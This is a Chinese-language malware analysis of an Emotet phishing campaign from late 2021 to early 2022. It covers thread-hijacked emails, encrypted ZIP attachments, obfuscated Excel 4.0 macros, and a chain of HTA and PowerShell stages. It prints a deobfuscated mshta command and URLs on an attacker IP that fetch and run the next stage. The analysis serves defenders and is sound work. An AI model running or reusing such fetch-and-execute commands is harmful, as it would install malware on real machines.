Emotet曾经是占主导地位的恶意软件玩家,经常改变攻击模式。2021年底,研究人员发现Emotet启用了一种新的攻击方法。该攻击是通过带有恶意Excel文件的鱼叉式网络钓鱼电子邮件发起的,其中包含经过混淆处理的Excel4.0宏。激活宏代码后,样本会下载并执行一个HTML应用程序,然后下载后续的PowerShell脚本和Emotet恶意样本。“光辉”历史Emotet于2014年首次被发现,此后一直保持活跃。2021年1月,执法部门关闭了Emotet的全球基础设施。该恶意软件消失了一段时间,但在2021年11月Emotet正式回归。Emotet经常使用线程劫持来发起攻击,从而Emotet可以在受感染主机的Emotet邮件客户端中生成虚假的回复电子邮件来回复合法电子邮件。自回归以来,Emotet使用了不同的攻击方法。2021年12月,Emotet在恶意邮件中携带恶意链接,下载虚假Adobe应用程序安装包。在2022年,Emotet转而使用带有恶意附件的电子邮件。有时,Emotet使用加密的ZIP文件作为附件。有时Excel文件只是作为附件附加。电子邮件Emotet发现了一封2021年6月的电子邮件,该电子邮件在2022年1月27日发送了一封虚假的回复电子邮件。该电子邮件带有一个加密的zip文件,并且在电子邮件中提供了密码。电子邮件诱饵文档的加密zip文件包含一个带有Excel4.0宏的Excel文件和一个醒目的提示,提示用户启用宏。启用诱饵文档宏后,执行cmd.exe运行mshta.ext。使用十六进制和字符混淆来绕过静态检测措施。去混淆后是cmd/cmshtahxxp://91.240.118.168/se/s.html。宏代码HTML文件被高度混淆并且执行会下载额外的PowerShell代码。混淆的HTML应用程序PowerShell混淆的PowerShell脚本通过hxxp://91.240.118.168/se/s.png下载Emotet的第二个PowerShell脚本。PowerShell代码第二个PowerShell脚本包含14个URL,该脚本会尝试每个URL下载Emotet恶意样本。部署多个URL使攻击基础设施更具弹性。在拉取流量攻击链的末端,通过DLL加密资源段加载并执行Emotet。Emotet样本结论Emotet是一个高度活跃的家族,经常改变策略以逃避检测。最新的攻击链显示,Emotet将使用多种类型的文件和高度混淆的脚本来发起攻击。
